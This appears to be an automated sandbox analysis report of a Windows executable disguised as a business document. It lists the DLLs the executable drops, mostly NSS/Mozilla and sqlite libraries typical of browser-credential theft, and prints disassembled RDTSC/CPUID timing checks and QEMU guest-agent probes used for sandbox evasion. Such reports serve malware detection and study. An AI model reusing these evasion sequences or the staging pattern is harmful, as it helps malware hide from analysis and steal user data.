Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldif60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll	Jump to dropped file

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F4854 second address: 00000000004F4854 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F1B00D673F8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007F1B00D673DCh 0x0000002e call 00007F1B00D67413h 0x00000033 call 00007F1B00D67408h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F2F21 second address: 00000000004F2F21 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F07D5 second address: 00000000004F07D5 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F1E36 second address: 00000000004F1E36 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 0000000000562CA5 second address: 0000000000562CA5 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798629979.000000000076A000.00000004.00000020.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 000000000040C72F second address: 000000000040C72F instructions: 0x00000000 rdtsc 0x00000002 cmp dh, FFFFFF98h 0x00000005 xor eax, edx 0x00000007 fsqrt 0x00000009 jmp 00007F1B00D61E6Fh 0x0000000e cmp cl, 00000036h 0x00000011 dec edi 0x00000012 cmp di, 009Eh 0x00000017 cmp edi, 00000000h 0x0000001a jne 00007F1B00D61BC5h 0x00000020 cmp ah, 0000006Ch 0x00000023 mov ebx, 00458D3Dh 0x00000028 cmp ax, 000000B3h 0x0000002c xor ebx, 00385DF4h 0x00000032 cmp esi, 5Bh 0x00000035 fdecstp 0x00000037 jmp 00007F1B00D61E6Ch 0x0000003c sub ebx, 003E5A87h 0x00000042 cmp al, BBh 0x00000044 xor ebx, 007F7642h 0x0000004a cmp ch, FFFFFF91h 0x0000004d cmp eax, 1Dh 0x00000050 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F4854 second address: 00000000004F4854 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F1B00D673F8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d add edi, edx 0x0000001f dec dword ptr [ebp+000000F8h] 0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000002c jne 00007F1B00D673DCh 0x0000002e call 00007F1B00D67413h 0x00000033 call 00007F1B00D67408h 0x00000038 lfence 0x0000003b mov edx, dword ptr [7FFE0014h] 0x00000041 lfence 0x00000044 ret 0x00000045 mov esi, edx 0x00000047 pushad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F4874 second address: 00000000004F4874 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F1B00D62159h 0x0000001d popad 0x0000001e call 00007F1B00D61E6Fh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F2F21 second address: 00000000004F2F21 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F07D5 second address: 00000000004F07D5 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F1E36 second address: 00000000004F1E36 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 00000000004F1F21 second address: 00000000004F239C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b add edi, 00001400h 0x00000011 test bl, al 0x00000013 mov eax, edi 0x00000015 mov ebx, eax 0x00000017 add ebx, 08h 0x0000001a mov dword ptr [eax], ebx 0x0000001c add ebx, 04h 0x0000001f mov dword ptr [eax+04h], ebx 0x00000022 sub edi, 00000400h 0x00000028 push edi 0x00000029 call 00007F1B00D621E0h 0x0000002e test cl, bl 0x00000030 push dword ptr [esp+04h] 0x00000034 jmp 00007F1B00D62D89h 0x00000039 call 00007F1B00D60DBCh 0x0000003e cmp dl, al 0x00000040 pop eax 0x00000041 pushad 0x00000042 lfence 0x00000045 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 0000000000564874 second address: 0000000000564874 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F1B00D677A9h 0x0000001d popad 0x0000001e call 00007F1B00D674BFh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 0000000000562CA0 second address: 0000000000562CA5 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push eax 0x00000004 pushad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	RDTSC instruction interceptor: First address: 0000000000562CA5 second address: 0000000000562CA5 instructions:

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
